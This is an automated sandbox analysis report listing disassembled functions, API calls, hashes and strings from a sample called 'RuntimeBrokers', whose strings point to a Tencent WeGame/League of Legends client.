                                        • ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEG_W@Z.MSVCP140(?), ref: 6C1063E6
                                        • ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEG_W@Z.MSVCP140(?), ref: 6C106429
                                        • ?width@ios_base@std@@QAE_J_J@Z.MSVCP140(00000000,00000000,00000000,00000030,6C108285,?,00000020), ref: 6C106490
                                        • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(00000000,00000000), ref: 6C10649F
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: ?sputc@?$basic_streambuf@_?width@ios_base@std@@U?$char_traits@_W@std@@@std@@$?good@ios_base@std@@D@std@@@std@@H_prolog3Lockit@std@@U?$char_traits@W@std@@$??0_??1_?flags@ios_base@std@@?flush@?$basic_ostream@?getloc@ios_base@std@@?setstate@?$basic_ios@?widen@?$ctype@_Bid@locale@std@@Facet_Getcat@?$ctype@_GetfacetH_prolog3_catchRegisterV12@V42@@Vfacet@locale@2@Vlocale@2@std::_std::locale::_
                                        • String ID:
                                        • API String ID: 1015832547-0
                                        • Opcode ID: 17476edbbc16c51449848cc39fac20f5b03364be7e479c719259dd04acb288e3
                                        • Instruction ID: 22f15e56222b4b536ead777f51ccc08d6d154000554711ef66490cf412d31965
                                        • Opcode Fuzzy Hash: 17476edbbc16c51449848cc39fac20f5b03364be7e479c719259dd04acb288e3
                                        • Instruction Fuzzy Hash: 4A515C74F0125A9FCF14CFA8C594AADBBB5BF49314F248169E919EB780CB349D80CB90
                                        Function 6C0DE2BD Relevance: 16.6, APIs: 11, Instructions: 71synchronizationCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SetEvent.KERNEL32(?,?,?,?,6C0DD372,B33B76E5,?,?,?,6C31CEF7,000000FF), ref: 6C0DE2D7
                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,6C0DD372,B33B76E5,?,?,?,6C31CEF7,000000FF), ref: 6C0DE2F6
                                        • CloseHandle.KERNEL32(?,?,?,?,6C0DD372,B33B76E5,?,?,?,6C31CEF7,000000FF), ref: 6C0DE2FE
                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,6C0DD372,B33B76E5,?,?,?,6C31CEF7,000000FF), ref: 6C0DE314
                                        • CloseHandle.KERNEL32(?,?,?,?,6C0DD372,B33B76E5,?,?,?,6C31CEF7,000000FF), ref: 6C0DE31C
                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C0DD372), ref: 6C0DE333
                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C0DD372), ref: 6C0DE341
                                        • CloseHandle.KERNEL32(00000000), ref: 6C0DE34F
                                        • CloseHandle.KERNEL32(?), ref: 6C0DE35D
                                        • CloseHandle.KERNEL32(00000000), ref: 6C0DE36B
                                        • CloseHandle.KERNEL32(?), ref: 6C0DE37D
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: CloseHandle$ObjectSingleWait$Event
                                        • String ID:
                                        • API String ID: 541887017-0
                                        • Opcode ID: 2cf0498a91f07c4606b3cfc104eb3dae02318cd0ff67326015c04ddb99d43158
                                        • Instruction ID: 229c7a6360e3f98dd179f36482ad9b8c273666a8652acb6ded6982f36d856609
                                        • Opcode Fuzzy Hash: 2cf0498a91f07c4606b3cfc104eb3dae02318cd0ff67326015c04ddb99d43158
                                        • Instruction Fuzzy Hash: A921EC70105B449FE721AF36CC84BA7F7E9BF5071CF114A2DE0A692AA0C7B5B854CE50
                                        Function 6C12A67F Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 265COMMON
                                        Download Yara Rule
                                        APIs
                                        • SetLastError.KERNEL32(00000057,B33B76E5,?,?,00000000,?,6C328D32,000000FF,?,6C12BB65,?,0000009C,00000000,000000B0,6C12BAB2,?), ref: 6C12AA8E
                                          • Part of subcall function 6C12D783: __EH_prolog3_GS.LIBCMT ref: 6C12D78A
                                          • Part of subcall function 6C12B293: __EH_prolog3_GS.LIBCMT ref: 6C12B29A
                                        • memset.VCRUNTIME140(?,00000000,00000040,?,?,?,?,B33B76E5,?,?,00000000,?,6C328D32,000000FF,?,6C12BB65), ref: 6C12A6F9
                                        • memset.VCRUNTIME140(?,00000000,00000200,?,00000000,00000040,?,?,?,?,B33B76E5,?,?,00000000,?,6C328D32), ref: 6C12A70C
                                        • memset.VCRUNTIME140(?,00000000,00000100,?,00000000,00000200,?,00000000,00000040,?,?,?,?,B33B76E5,?,?), ref: 6C12A720
                                        • memset.VCRUNTIME140(?,00000000,00000100,?,00000000,00000100,?,00000000,00000200,?,00000000,00000040,?,?,?,?), ref: 6C12A72F
                                        • memset.VCRUNTIME140(?,00000000,00001000), ref: 6C12A745
                                        • memset.VCRUNTIME140(?,00000000,0000003C,?,00000000,00001000), ref: 6C12A757
                                        • WinHttpCrackUrl.WINHTTP ref: 6C12A7F0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: memset$H_prolog3_$CrackErrorHttpLast
                                        • String ID:
                                        • API String ID: 2503125090-3916222277
                                        • Opcode ID: eb23f78d3705cb8884a8f22a19889f5e2a8985908987938f9e4edf5cd22cd024
                                        • Instruction ID: 32957c0bb9411b951fd7aaf29a506a79f5f6911aa5e0fa789e1fdeb722540236
                                        • Opcode Fuzzy Hash: eb23f78d3705cb8884a8f22a19889f5e2a8985908987938f9e4edf5cd22cd024
                                        • Instruction Fuzzy Hash: 3EC1F975C05268DECB21CBA4CC84BDEB7F8AF15348F5001DAE149A7690EB746B88CF61
                                        Function 00478311 Relevance: 16.0, APIs: 3, Strings: 6, Instructions: 240COMMON
                                        Download Yara Rule
                                        Strings
                                        • %u%u%u%d, xrefs: 00478485
                                        • http://lol.qq.com/client/client.shtml?uin=%u&area=%u&timestamp=%u&Signature=%s, xrefs: 00478678
                                        • ..\Air\lol.properties, xrefs: 0047838B
                                        • TCLS, xrefs: 004786B0
                                        • lobbyLandingURL, xrefs: 004786AB
                                        • [Launch][TCLS_Launcher::ModifyLOLLandingPageURL], xrefs: 00478347
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2954513519.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2954495294.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954625279.000000000052E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954661807.0000000000577000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954678573.0000000000578000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954698601.000000000058A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: AttributesFile
                                        • String ID: %u%u%u%d$..\Air\lol.properties$TCLS$[Launch][TCLS_Launcher::ModifyLOLLandingPageURL]$http://lol.qq.com/client/client.shtml?uin=%u&area=%u&timestamp=%u&Signature=%s$lobbyLandingURL
                                        • API String ID: 3188754299-792072193
                                        • Opcode ID: cfc3483be9e46dacab18896c0cbe6ede54744735cbb5667eadc22861a1fd5a09
                                        • Instruction ID: 34f15c6c334c2eb39fcd977357367aedb09c7e7c50743947198e0e3894bf6ef7
                                        • Opcode Fuzzy Hash: cfc3483be9e46dacab18896c0cbe6ede54744735cbb5667eadc22861a1fd5a09
                                        • Instruction Fuzzy Hash: 50A14E75D45228AFDF60DB64CC49BDAB7B8AB08304F4041EAE10DE62D1DB749EA4CF19
                                        Function 6C1D3F80 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 220fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6C1D404E
                                        • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,6C35EB7C), ref: 6C1D4067
                                        • fgets.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00001388,00000000,?,?,?,?,?,?,?,?), ref: 6C1D40A9
                                        • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,?), ref: 6C1D4108
                                        • fgets.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00001388,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 6C1D4133
                                        • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C1D415E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: fclosefgets$__acrt_iob_funcfopen
                                        • String ID: Set-Cookie:$ignoring failed cookie_init for %s$none
                                        • API String ID: 3969962324-4095489131
                                        • Opcode ID: a43fa2fe88cb69c08a53b4762648461bfafc2dd8942c22be0467dff3009f8570
                                        • Instruction ID: 24fed1516fb67a96c54acf51f5e3514665dc1418e5b1762e2d77e2ff3b3723b6
                                        • Opcode Fuzzy Hash: a43fa2fe88cb69c08a53b4762648461bfafc2dd8942c22be0467dff3009f8570
                                        • Instruction Fuzzy Hash: 53618875A083419BDB209F245C01BDB3BA45F7770CF0A0168ED846BB42E776F909CB92
                                        Function 6C0CFE4A Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 199networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C0CFE69
                                        • htons.WS2_32(00000000), ref: 6C0CFEBD
                                        • inet_addr.WS2_32(?), ref: 6C0CFED2
                                        • sendto.WS2_32(?,?,00000000,00000000,?,00000010), ref: 6C0CFEF0
                                        • WSAGetLastError.WS2_32(?,?,?,?,?,00000124), ref: 6C0CFEF8
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,?,?,00000124), ref: 6C0CFF18
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(00000124), ref: 6C0D0000
                                        Strings
                                        • d:\ci_dev\wegame_client\codes\common\src\asy_udp.cpp, xrefs: 6C0CFF41, 6C0D0029
                                        • [common][Asy_udp] sock(%d) sendto (%s:%d) failed, err=%d, xrefs: 6C0CFF63
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: ?get_log_instance@base@@Logger@1@$ErrorH_prolog3_Lasthtonsinet_addrsendto
                                        • String ID: [common][Asy_udp] sock(%d) sendto (%s:%d) failed, err=%d$d:\ci_dev\wegame_client\codes\common\src\asy_udp.cpp
                                        • API String ID: 3567040146-4223501694
                                        • Opcode ID: cf9b7230218cb367effaa561230db71df93a7c1b4dc909ae2ff9b072681feeb9
                                        • Instruction ID: 4875e7d9c7a0d21a03fb5c23d2667383e38e13ab6d7cfe343a25232435083c77
                                        • Opcode Fuzzy Hash: cf9b7230218cb367effaa561230db71df93a7c1b4dc909ae2ff9b072681feeb9
                                        • Instruction Fuzzy Hash: 5271C171A05258ABDB14DBA4CC54BEE77F8AF05308F104598E459A76C0EB35AE48CF52
                                        Function 6C15BEA8 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 171COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_catch_GS.LIBCMT ref: 6C15BEB2
                                          • Part of subcall function 6C0AA8F0: memmove.VCRUNTIME140(?,?,6C0B5839,?,?,00000000,?,?,6C0B5839,?,?), ref: 6C0AA917
                                        • ?get_local_drivers_hd@Sys_wrapper@common@ierd_tgp@@SAXAAV?$vector@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V?$allocator@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@std@@@Z.COMMON(?), ref: 6C15BF04
                                          • Part of subcall function 6C15CD9B: __EH_prolog3_GS.LIBCMT ref: 6C15CDA5
                                          • Part of subcall function 6C15CD9B: memset.VCRUNTIME140(?,00000000,00000104,000001D8,6C15C257,?,6C3CE62F,00000000,00000088,6C15BDD4,?), ref: 6C15CDBD
                                          • Part of subcall function 6C15CD9B: GetLogicalDriveStringsA.KERNEL32(00000104,?), ref: 6C15CDCD
                                          • Part of subcall function 6C15CD9B: GetDriveTypeA.KERNEL32(?), ref: 6C15CDEA
                                          • Part of subcall function 6C15CD9B: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C15CE57
                                        • ?get_free_space@Sys_wrapper@common@ierd_tgp@@SA_KABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@PA_N@Z.COMMON(?,00000000,?,00000018), ref: 6C15BF4F
                                        • _CxxThrowException.VCRUNTIME140(?,6C3EB60C,there is not any hd driver,00000018), ref: 6C15C037
                                        • __EH_prolog3_catch_GS.LIBCMT ref: 6C15C047
                                        • ?get_local_drivers_hd@Sys_wrapper@common@ierd_tgp@@SAXAAV?$vector@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V?$allocator@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@std@@@Z.COMMON(?,6C3CE62F,00000000,00000090,?,6C3EB60C,there is not any hd driver,00000018), ref: 6C15C0A2
                                        • ?get_free_space@Sys_wrapper@common@ierd_tgp@@SA_KABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@PA_N@Z.COMMON(?,00000000,00000018,6C3CE62F,00000000,00000090,?,6C3EB60C,there is not any hd driver,00000018), ref: 6C15C10A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: V?$allocator@$D@std@@U?$char_traits@V?$basic_string@$D@2@@std@@Sys_wrapper@common@ierd_tgp@@$?get_free_space@?get_local_drivers_hd@D@2@@std@@@2@@std@@@DriveH_prolog3_catch_V?$vector@$ExceptionH_prolog3_LogicalStringsThrowTypememmovememsetstrlen
                                        • String ID: there is not any hd driver
                                        • API String ID: 1211781480-2535490614
                                        • Opcode ID: e16c3429813e805627d11858f1904bdb3d5b3c3f3d5ed8e56f0697fd2a46d8b8
                                        • Instruction ID: 5766d4b63fec5a2124679efe12a73f1a8316032b571db3b2783abe69155769f7
                                        • Opcode Fuzzy Hash: e16c3429813e805627d11858f1904bdb3d5b3c3f3d5ed8e56f0697fd2a46d8b8
                                        • Instruction Fuzzy Hash: 67617AB0D05218DBDF10DFA9C9907DDBBB5BF59308F60809EE018ABA41CB746A85DF91
                                        Function 6C102060 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 162COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C10206A
                                          • Part of subcall function 6C0B6B70: ?_Execute_once@std@@YAHAAUonce_flag@1@P6GHPAX1PAPAX@Z1@Z.MSVCP140(6C438534,6C0B6BB1,6C438538,?,6C0BA235,00000000,?,00000010), ref: 6C0B6B81
                                          • Part of subcall function 6C0B6B70: terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C0B6B8D
                                          • Part of subcall function 6C101DD6: __EH_prolog3_GS.LIBCMT ref: 6C101DE0
                                          • Part of subcall function 6C101DD6: FindNextFileW.KERNEL32(?,?,00000274,6C10212D,?,-00000028,?,?,?,0000008C,6C0BBD5A,?,00000000), ref: 6C101E09
                                          • Part of subcall function 6C101DD6: GetLastError.KERNEL32(?,00000000), ref: 6C101E13
                                          • Part of subcall function 6C101DD6: ?dir_itr_close@detail@filesystem@ierd_tgp@@YAXAAPAX@Z.COMMON(?,?,00000000), ref: 6C101E21
                                        • ?path@directory_entry@filesystem@ierd_tgp@@QBE?BV023@XZ.COMMON(?), ref: 6C102142
                                        • ?parent_path@path@filesystem@ierd_tgp@@QBE?AV123@XZ.COMMON(?,?), ref: 6C102151
                                        • GetLastError.KERNEL32(?,?), ref: 6C1021C1
                                          • Part of subcall function 6C0BCEF6: memmove.VCRUNTIME140(00000000,?,?,00000001,?,?,?,?,?,?,6C0BA734,?,00000004,6C0BA09E,?,B33B76E5), ref: 6C0BCF55
                                        • ?replace_filename@directory_entry@filesystem@ierd_tgp@@QAEXABVpath@23@Vfile_status@23@1@Z.COMMON(?,?,?,?,?,?), ref: 6C1021AA
                                          • Part of subcall function 6C0BF117: ?remove_filename@path@filesystem@ierd_tgp@@QAEAAV123@XZ.COMMON(00000000,?,6C1021AF,?,?,?,?,?,?), ref: 6C0BF11D
                                          • Part of subcall function 6C0BF117: ??_0path@filesystem@ierd_tgp@@QAEAAV012@ABV012@@Z.COMMON(?,00000000,?,6C1021AF,?,?,?,?,?,?), ref: 6C0BF127
                                        • GetLastError.KERNEL32(?,?), ref: 6C1021F1
                                        • ??0file_status@filesystem@ierd_tgp@@QAE@W4file_type@12@W4perms@12@@Z.COMMON(00000000,00000000), ref: 6C1021FC
                                        • _CxxThrowException.VCRUNTIME140(?,6C3DBC60,?,?,?,?,ierd_tgp::filesystem::directory_iterator::operator++,00000000,00000000), ref: 6C102238
                                        Strings
                                        • ierd_tgp::filesystem::directory_iterator::operator++, xrefs: 6C102201
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: ErrorLast$H_prolog3_V123@$??0file_status@filesystem@ierd_tgp@@??_0path@filesystem@ierd_tgp@@?dir_itr_close@detail@filesystem@ierd_tgp@@?parent_path@path@filesystem@ierd_tgp@@?path@directory_entry@filesystem@ierd_tgp@@?remove_filename@path@filesystem@ierd_tgp@@?replace_filename@directory_entry@filesystem@ierd_tgp@@ExceptionExecute_once@std@@FileFindNextThrowUonce_flag@1@V012@V012@@V023@Vfile_status@23@1@Vpath@23@W4file_type@12@W4perms@12@@memmoveterminate
                                        • String ID: ierd_tgp::filesystem::directory_iterator::operator++
                                        • API String ID: 494074189-2224817405
                                        • Opcode ID: 39d47b8606502f0f6b00708a3e5fdb971eaa30427dfe07ca6b5fbf127cc4a447
                                        • Instruction ID: e18d64a8923b9d74520bb15a14fd3c1ca36020f5952671f015af52a21ba56c01
                                        • Opcode Fuzzy Hash: 39d47b8606502f0f6b00708a3e5fdb971eaa30427dfe07ca6b5fbf127cc4a447
                                        • Instruction Fuzzy Hash: 17613AB5D00248DFCF15DFE4C844ADEBBF8AF59314F24416AE119BB640DB34AA49CBA1
                                        Function 6C0EA607 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 133COMMON
                                        Download Yara Rule
                                        APIs
                                        • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140(00000001), ref: 6C0EA743
                                          • Part of subcall function 6C0E48ED: __EH_prolog3.LIBCMT ref: 6C0E48F4
                                          • Part of subcall function 6C0E48ED: ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140(00000008), ref: 6C0E4911
                                          • Part of subcall function 6C0E48ED: ??0?$basic_istream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140(?,00000000,00000000,00000008), ref: 6C0E4929
                                        • ?decode_stream@common@ierd_tgp@@YA?AV?$optional@V?$reference_wrapper@V?$basic_istringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@std@@@std@@AAV?$basic_istream@DU?$char_traits@D@std@@@4@AAV?$basic_istringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z.COMMON(?,?,?,00000001), ref: 6C0EA659
                                          • Part of subcall function 6C0FF60A: __EH_prolog3_GS.LIBCMT ref: 6C0FF614
                                          • Part of subcall function 6C0FF60A: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP140(?,00000002,00000001,000000BC), ref: 6C0FF644
                                          • Part of subcall function 6C0FF60A: ?decode_string@common@ierd_tgp@@YA?AV?$optional@V?$reference_wrapper@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@std@@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z.COMMON(?,?,?), ref: 6C0FF665
                                          • Part of subcall function 6C0FF60A: ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140(?), ref: 6C0FF6AC
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 6C0EA668
                                          • Part of subcall function 6C0BA5EF: __EH_prolog3.LIBCMT ref: 6C0BA5F6
                                          • Part of subcall function 6C0BE945: __EH_prolog3_catch_GS.LIBCMT ref: 6C0BE94C
                                        • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140 ref: 6C0EA6F5
                                        • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140 ref: 6C0EA710
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 6C0EA750
                                        Strings
                                        • d:\ci_dev\wegame_client\codes\common\src\cfg_file_model.cpp, xrefs: 6C0EA68C, 6C0EA77C
                                        • [cfg_file_model]file not exist, path:%s, xrefs: 6C0EA79F
                                        • [cfg_mgr][cfg_file]decode failed, path:%s, xrefs: 6C0EA6AF
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
